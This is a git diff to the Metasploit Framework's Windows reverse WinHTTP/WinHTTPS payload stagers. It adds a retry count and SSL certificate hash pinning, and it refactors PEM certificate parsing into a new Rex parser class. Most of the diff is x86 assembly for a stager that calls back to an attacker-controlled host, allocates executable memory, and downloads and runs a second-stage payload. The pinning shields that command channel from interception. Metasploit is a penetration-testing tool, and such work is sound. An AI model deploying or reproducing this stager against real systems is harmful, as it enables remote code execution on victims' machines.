diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index bbb4d94575..8a5be39790 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -36,7 +36,8 @@ module Payload::Windows::ReverseWinHttp ssl: false, host: datastore['LHOST'], port: datastore['LPORT'], - url: generate_small_uri) + url: generate_small_uri, + retry_count: datastore['StagerRetryCount']) end conf = { @@ -44,7 +45,8 @@ module Payload::Windows::ReverseWinHttp host: datastore['LHOST'], port: datastore['LPORT'], url: generate_uri, - exitfunk: datastore['EXITFUNC'] + exitfunk: datastore['EXITFUNC'], + retry_count: datastore['StagerRetryCount'] } generate_reverse_winhttp(conf) @@ -98,23 +100,32 @@ module Payload::Windows::ReverseWinHttp join(",") end + # - # Dynamic payload generation + # Generate an assembly stub with the configured feature set and options. + # + # @option opts [Bool] :ssl Whether or not to enable SSL + # @option opts [String] :url The URI to request during staging + # @option opts [String] :host The host to connect to + # @option opts [Fixnum] :port The port to connect to + # @option opts [Bool] :verify_ssl Whether or not to do SSL certificate validation + # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify + # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [Fixnum] :retry_count The number of times to retry a failed request before giving up # def asm_reverse_winhttp(opts={}) + retry_count = [opts[:retry_count].to_i, 1].max + verify_ssl = nil + encoded_cert_hash = nil + encoded_url = asm_generate_wchar_array(opts[:url]) + encoded_host = asm_generate_wchar_array(opts[:host]) - # - # options should contain: - # ssl: (true|false) - # url: "/url_to_request" - # host: [hostname] - # port: [port] - # exitfunk: [process|thread|seh|sleep] - # + if opts[:ssl] && opts[:verify_cert] && opts[:verify_cert_hash] + verify_ssl = true + encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",") + end - encoded_url = asm_generate_wchar_array(opts[:url]) - encoded_host = asm_generate_wchar_array(opts[:host]) http_open_flags = 0 @@ -137,46 +148,52 @@ module Payload::Windows::ReverseWinHttp push esp ; Push a pointer to the "winhttp" string push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA( "winhttp" ) + ^ - set_retry: - push.i8 6 ; retry 6 times - pop edi - xor ebx, ebx - mov ecx, edi + if verify_ssl + asm << %Q^ + load_crypt32: + push 0x00323374 ; Push the string 'crypt32',0 + push 0x70797263 ; ... + push esp ; Push a pointer to the "crypt32" string + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wincrypt" ) + ^ + end - push_zeros: - push ebx ; NULL values for the WinHttpOpen API parameters - loop push_zeros + asm << %Q^ + + xor ebx, ebx WinHttpOpen: - ; Flags [5] - ; ProxyBypass (NULL) [4] - ; ProxyName (NULL) [3] - ; AccessType (DEFAULT_PROXY= 0) [2] - ; UserAgent (NULL) [1] + push ebx ; Flags + push ebx ; ProxyBypass (NULL) + push ebx ; ProxyName (NULL) + push ebx ; AccessType (DEFAULT_PROXY= 0) + push ebx ; UserAgent (NULL) [1] push 0xBB9D1F04 ; hash( "winhttp.dll", "WinHttpOpen" ) call ebp WinHttpConnect: - push ebx ; Reserved (NULL) [4] + push ebx ; Reserved (NULL) push #{opts[:port]} ; Port [3] call got_server_uri ; Double call to get pointer for both server_uri and - server_uri: ; server_host; server_uri is saved in EDI for later + server_uri: ; server_host; server_uri is saved in edi for later db #{encoded_url} got_server_host: - push eax ; Session handle returned by WinHttpOpen [1] + push eax ; Session handle returned by WinHttpOpen push 0xC21E9B46 ; hash( "winhttp.dll", "WinHttpConnect" ) call ebp WinHttpOpenRequest: - push.i32 #{"0x%.8x" % http_open_flags} - push ebx ; AcceptTypes (NULL) [6] - push ebx ; Referrer (NULL) [5] - push ebx ; Version (NULL) [4] - push edi ; ObjectName (URI) [3] - push ebx ; Verb (GET method) (NULL) [2] - push eax ; Connect handler returned by WinHttpConnect [1] + push #{"0x%.8x" % http_open_flags} + push ebx ; AcceptTypes (NULL) + push ebx ; Referrer (NULL) + push ebx ; Version (NULL) + push edi ; ObjectName (URI) + push ebx ; Verb (GET method) (NULL) + push eax ; Connect handle returned by WinHttpConnect push 0x5BB31098 ; hash( "winhttp.dll", "WinHttpOpenRequest" ) call ebp xchg esi, eax ; save HttpRequest handler in esi @@ -192,9 +209,9 @@ module Payload::Windows::ReverseWinHttp ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA mov eax, esp - push.i8 4 ; sizeof(buffer) + push 4 ; sizeof(buffer) push eax ; &buffer - push.i8 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) + push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest push 0xCE9D58D3 ; hash( "winhttp.dll", "WinHttpSetOption" ) call ebp @@ -202,6 +219,11 @@ module Payload::Windows::ReverseWinHttp end asm << %Q^ + ; Store our retry counter in the edi register + set_retry: + push #{retry_count} + pop edi + send_request: WinHttpSendRequest: @@ -215,7 +237,7 @@ module Payload::Windows::ReverseWinHttp push 0x91BB5895 ; hash( "winhttp.dll", "WinHttpSendRequest" ) call ebp test eax,eax - jnz receive_response ; if TRUE call WinHttpReceiveResponse API + jnz check_response ; if TRUE call WinHttpReceiveResponse API try_it_again: dec edi @@ -237,12 +259,79 @@ module Payload::Windows::ReverseWinHttp ^ end + # Jump target if the request was sent successfully + asm << %Q^ + check_response: + ^ + + # Verify the SSL certificate hash + if verify_ssl + + asm << %Q^ + ssl_cert_get_context: + push 4 + mov ecx, esp ; Allocate &bufferLength + push 0 + mov ebx, esp ; Allocate &buffer (ebx will point to *pCert) + + push ecx ; &bufferLength + push ebx ; &buffer + push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) + push esi ; hHttpRequest + push 0x272F0478 ; hash( "winhttp.dll", "WinHttpQueryOption" ) + call ebp + test eax, eax ; + jz failure ; Bail out if we couldn't get the certificate context + + ; ebx + ssl_cert_allocate_hash_space: + push 20 ; + mov ecx, esp ; Store a reference to the address of 20 + sub esp,[ecx] ; Allocate 20 bytes for the hash output + mov edi, esp ; edi will point to our buffer + + ssl_cert_get_server_hash: + push ecx ; &bufferLength + push edi ; &buffer (20-byte SHA1 hash) + push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) + push [ebx] ; *pCert + push 0xC3A96E2D ; hash( "crypt32.dll", "CertGetCertificateContextProperty" ) + call ebp + test eax, eax ; + jz failure ; Bail out if we couldn't get the certificate context + + ssl_cert_start_verify: + call ssl_cert_compare_hashes + db #{encoded_cert_hash} + + ssl_cert_compare_hashes: + pop ebx ; ebx points to our internal 20-byte certificate hash (overwrites *pCert) + ; edi points to the server-provided certificate hash + + push 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times + pop ecx ; + mov edx, ecx ; Keep a reference to 4 in edx + + ssl_cert_verify_compare_loop: + mov eax, [ebx] ; Grab the next DWORD of the hash + cmp eax, [edi] ; Compare with the server hash + jnz failure ; Bail out if the DWORD doesn't match + add ebx, edx ; Increment internal hash pointer by 4 + add edi, edx ; Increment server hash pointer by 4 + loop ssl_cert_verify_compare_loop + + ; Our certificate hash was valid, hurray! + ssl_cert_verify_cleanup: + xor ebx, ebx ; Reset ebx back to zero + ^ + end + asm << %Q^ receive_response: ; The API WinHttpReceiveResponse needs to be called - ; first to get a valid handler for WinHttpReadData - push ebx ; Reserved (NULL) [2] - push esi ; Request handler returned by WinHttpSendRequest [1] + ; first to get a valid handle for WinHttpReadData + push ebx ; Reserved (NULL) + push esi ; Request handler returned by WinHttpSendRequest push 0x709D8805 ; hash( "winhttp.dll", "WinHttpReceiveResponse" ) call ebp test eax,eax @@ -251,7 +340,7 @@ module Payload::Windows::ReverseWinHttp asm << %Q^ allocate_memory: - push.i8 0x40 ; PAGE_EXECUTE_READWRITE + push 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is @@ -299,6 +388,8 @@ module Payload::Windows::ReverseWinHttp asm end + + end end diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index 4a219c8b4e..993347db35 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -2,6 +2,7 @@ require 'msf/core' require 'msf/core/payload/windows/reverse_winhttp' +require 'rex/parser/x509_certificate' module Msf @@ -17,6 +18,17 @@ module Payload::Windows::ReverseWinHttps include Msf::Payload::Windows::ReverseWinHttp + # + # Register reverse_winhttps specific options + # + def initialize(*args) + super + register_advanced_options( + [ + OptBool.new('StagerVerifySSLCert', [false, 'Whether to verify the SSL certificate hash in the handler', false]) + ], self.class) + end + # # Generate and compile the stager # @@ -37,13 +49,38 @@ module Payload::Windows::ReverseWinHttps # def generate + verify_cert = false + verify_cert_hash = nil + + if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i + unless datastore['HandlerSSLCert'] + raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured" + else + verify_cert = true + hcert = Rex::Parser::X509Certificate.parse_pem_file(datastore['HandlerSSLCert']) + unless hcert and hcert[0] and hcert[1] + raise ArgumentError, "Could not parse a private key and certificate from #{datastore['HandlerSSLCert']}" + end + verify_cert_hash = Rex::Text.sha1_raw(hcert[1].to_der) + print_status("Stager will verify SSL Certificate with SHA1 hash #{verify_cert_hash.unpack("H*").first}") + end + end + # Generate the simple version of this stager if we don't have enough space if self.available_space.nil? || required_space > self.available_space + + if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i + raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available" + end + return generate_reverse_winhttps( ssl: true, host: datastore['LHOST'], port: datastore['LPORT'], - url: generate_small_uri) + url: generate_small_uri, + verify_cert: verify_cert, + verify_cert_hash: verify_cert_hash, + retry_count: datastore['StagerRetryCount']) end conf = { @@ -51,12 +88,32 @@ module Payload::Windows::ReverseWinHttps host: datastore['LHOST'], port: datastore['LPORT'], url: generate_uri, - exitfunk: datastore['EXITFUNC'] + exitfunk: datastore['EXITFUNC'], + verify_cert: verify_cert, + verify_cert_hash: verify_cert_hash, + retry_count: datastore['StagerRetryCount'] } generate_reverse_winhttps(conf) end + # + # Determine the maximum amount of space required for the features requested + # + def required_space + space = super + + # SSL support adds 20 bytes + space += 20 + + # SSL verification adds 120 bytes + if datastore['StagerVerifySSLCert'] + space += 120 + end + + space + end + end end diff --git a/lib/rex/parser/x509_certificate.rb b/lib/rex/parser/x509_certificate.rb new file mode 100644 index 0000000000..f46500bf5c --- /dev/null +++ b/lib/rex/parser/x509_certificate.rb @@ -0,0 +1,62 @@ +# -*- coding: binary -*- + +require 'openssl' + +module Rex +module Parser + +### +# +# This class parses the contents of a PEM-encoded X509 certificate file containing +# a private key, a public key, and any appended glue certificates. +# +### +class X509Certificate + + # + # Parse a certificate in unified PEM format that contains a private key and + # one or more certificates. The first certificate is the primary, while any + # additional certificates are treated as intermediary certificates. This emulates + # the behavior of web servers like nginx. + # + # @param [String] ssl_cert + # @return [String, String, Array] + def self.parse_pem(ssl_cert) + cert = nil + key = nil + chain = nil + + certs = [] + ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem| + if pem =~ /PRIVATE KEY/ + key = OpenSSL::PKey::RSA.new(pem) + elsif pem =~ /CERTIFICATE/ + certs << OpenSSL::X509::Certificate.new(pem) + end + end + + cert = certs.shift + if certs.length > 0 + chain = certs + end + + [key, cert, chain] + end + + # + # Parse a certificate in unified PEM format from a file + # + # @param [String] ssl_cert_file + # @return [String, String, Array] + def self.parse_pem_file(ssl_cert_file) + data = '' + ::File.open(ssl_cert_file, 'rb') do |fd| + data << fd.read(fd.stat.size) + end + parse_pem(data) + end + +end + +end +end diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb index 27ee44696f..742685d596 100644 --- a/lib/rex/socket/ssl_tcp_server.rb +++ b/lib/rex/socket/ssl_tcp_server.rb @@ -2,6 +2,7 @@ require 'rex/socket' require 'rex/socket/tcp_server' require 'rex/io/stream_server' +require 'rex/parser/x509_certificate' ### # @@ -108,25 +109,7 @@ module Rex::Socket::SslTcpServer # @param [String] ssl_cert # @return [String, String, Array] def self.ssl_parse_pem(ssl_cert) - cert = nil - key = nil - chain = nil - - certs = [] - ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem| - if pem =~ /PRIVATE KEY/ - key = OpenSSL::PKey::RSA.new(pem) - elsif pem =~ /CERTIFICATE/ - certs << OpenSSL::X509::Certificate.new(pem) - end - end - - cert = certs.shift - if certs.length > 0 - chain = certs - end - - [key, cert, chain] + Rex::Parser::X509Certificate.parse_pem(ssl_cert) end #